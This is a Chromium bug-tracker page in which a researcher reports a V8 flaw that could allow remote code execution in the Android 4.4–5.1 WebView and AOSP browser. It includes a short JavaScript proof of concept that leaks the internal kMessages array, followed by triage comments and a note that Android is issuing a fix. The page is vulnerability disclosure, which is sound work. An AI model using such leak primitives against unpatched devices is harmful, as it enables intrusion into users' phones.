Issue metadata
Sign in to add a comment
|
Security: v8 bug lead to RCE in aosp browser or webview on Android 4.4,5.0,5.1
Reported by
higonggu...@gmail.com,
Aug 23 2016
|
||||||||||||||||||||
Issue description
VERSION
this is a v8 bug ,and affect v8 version 3.20 to 4.2. As aosp browser and webview in Android using old blink kernel, so i think it should be fixed.
Chrome Version: [37.0.2062.117] + [stable]
Operating System: Android 4.4,5.0,5.1
REPRODUCTION CASE
kMessages is observable which lead to exception can be controlled to leak InternalArray.
The code to leak kMessages is as follows:
<script>
var kMessages;
Object.prototype.__defineGetter__("observe_accept_invalid",function(){kMessages=this});
try{Object.observe({},function(){},1)}catch(e){}
delete Object.prototype["observe_accept_invalid"];
alert(kMessages);
</script>
the full exploit in chrome 37 is attached too.
,
Aug 23 2016
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=5726907608072192
,
Aug 23 2016
Chrome version used is really old, please use latest version. Also, unable to reproduce.
,
Aug 24 2016
I think you haven't understand this issue, it affect android webview on android 4.4,5.0,and 5.1, and these system is still in maintance.
,
Aug 24 2016
please involve engineer in android security team, they'll know what i'm talk about.
,
Aug 24 2016
+cc folks from Android Security to create tracking bug if needed. I don't think webview is getting updates on older releases.
,
Aug 31 2016
AndroidID-31217937 logged to review this for Android.
,
Sep 26 2016
Note, Android is issuing a fix for this.
,
Nov 30 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||
Comment 1 by ClusterFuzz
, Aug 23 2016